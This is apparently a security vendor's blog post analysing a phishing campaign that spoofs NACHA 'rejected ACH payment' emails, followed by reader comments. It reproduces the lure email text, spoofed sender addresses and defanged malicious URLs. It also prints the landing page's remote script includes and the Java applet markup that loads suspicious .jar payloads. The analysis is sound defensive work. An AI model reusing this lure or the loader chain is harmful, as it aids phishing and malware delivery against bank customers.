Emails regarding rejected ACH payment contains security risk


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subjects like:

Rejected ACH transaction
Rejected ACH payment
Your ACH transfer

The email is send from the spoofed addresses like:

“\”The Electronic Payments Association\” risk.manager”@nacha.org
“\”The Electronic Payments Association\” alerts”@nacha.org
“\”The Electronic Payments Association\” risk”@nacha.org
“\”The Electronic Payments Association\” transfers”@nacha.org
“\”The Electronic Payments Association\” ach”@nacha.org
“\”The Electronic Payments Association\” payment”@nacha.org

The email has the following body:

The ACH transaction (ID: 02710822288793), recently sent from your checking account (by you or any other person), was rejected by the Electronic Payments Association.

Canceled transaction
Transaction ID: 02710822288793
Reason for rejection See details in the report below
Transaction Report report_02710822288793.doc (Microsoft Word Document)

13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171

2011 NACHA – The Electronic Payments Association

A sample of the email:

The URLs for the transaction report are different and in some cases no longer valid. Some examples:

hxxp://minalimo.com/f9oYYmiY/index.html
hxxp://maerlipinte.ch/LaV4inWa/index.html
hxxp://hotel-sicily.it/aRpcdCjd/index.html

One of the URLs did give us a result: hxxp://ftp.samisalami.com/8KQZuSAy/index.html.

When investigating the HTML code of this web page we got the following:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”hxxp://firstnamestore.com/utn08WYD/js.js”></script>
<script type=”text/javascript” src=”hxxp://ftp.adamsmarketing.com/VRssE3iH/js.js”></script>
<script type=”text/javascript” src=”hxxp://mediapoolstarnberg.de/WrqeCaoy/js.js”></script>
<script type=”text/javascript” src=”hxxp://paolomisirochi.com/nqrmZKRC/js.js”></script>
<script type=”text/javascript” src=”hxxp://lonnytyler.com/MZF0uXsc/js.js”></script>
<script type=”text/javascript” src=”hxxp://orquestrachapo.com/jAmCDzeM/js.js”></script>

</html>

As you can see, some Javascripts are loaded when opening this web page. Some URLs to the javascripts are also obsolete but some of them returns the code: “document.location=’hxxp://sulusate.com/forum/index.php?showtopic=997439′;”.

The above URL gives us the web page with the following code:

<body>
<applet code=’Verifa.class’ archive=’rhi.jar’ width=’24’ height=’22’>
<param name=”dest” value=”lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAvlmrs”>
</applet>
</body><body>
<applet code=’Ooo.class’ archive=’Ooo.jar’ width=’24’ height=’22’>
<param name=”dest” value=”lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAsfi”>
</applet>
</body>

When opening the URLs  in a web browser – something we do not recommend to even try – you will get redirected to bing.com or another web site so you won’t see this code.

It seems that some javascript is obfuscated and that .jar files are involved here inside an applet. The risk is that these applets in java could contain malicious code. Ooo.jar is however related to OpenOffice but in this case it can also be used for phishing.

This email is a security risk – a virus or a phishing attempt – for sure so do not follow any URLs or open files.

4 thoughts on “Emails regarding rejected ACH payment contains security risk

  1. Thank you for the detailed information on this problem. What we really want is a forwarding address to send it to someone that is able to track and prosecute the offender.

  2. I have just had the same email but saying my direct debit transaction was successful. Who do we forward this on to? Thanks

  3. i got a email but was from Electronic Payments Association (7306C6333@hgll.com) ..
    thanks for the post ..

Comments are closed.